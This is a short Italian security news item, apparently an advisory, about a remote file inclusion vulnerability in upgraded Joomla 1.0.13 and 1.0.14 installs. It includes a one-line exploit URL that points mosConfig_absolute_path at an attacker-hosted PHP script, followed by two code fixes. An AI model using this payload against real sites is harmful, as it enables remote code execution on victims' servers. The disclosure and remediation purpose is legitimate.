Nelle ultime due versioni di Joomla, 1.0.13 e 1.0.14, è possibile inviare da remoto su siti con il suddetto CMS dei file e/o del codice arbitrario. Questa vulnerabilità è dovuta all'aggiornamento di una vecchia versione (dunque non un'installazione ex-novo) con la nuova (1.0.13 o 1.0.14) lasciando intatto il file
configuration.php. Infatti, così facendo, nel file risulterebbe non definita la variabile
RG_EMULATION.
Tuttavia, affinchè questo exploit possa funzionare, in PHP
register_globals deve essere settata su "off".
E' possibile lanciare l'exploit nel modo seguente:
http://sito_vittima/index.php?mosConfig_absolute_path=http://sito_proprio/php_script.txtPer risolvere la vulnerabilità sostituire nei file
index*.php e
administrator/index*.php la stringa seguente:
require_once('configuration.php');con
require('configuration.php');In alternativa è possibile definire e disabilitare la variabile
RG_EMULATION nel file
configuration.php:
if(!defined('RG_EMULATION')) { define( 'RG_EMULATION', 0 ); }
COMMENTA LA NEWS SUL FORUM
Forum
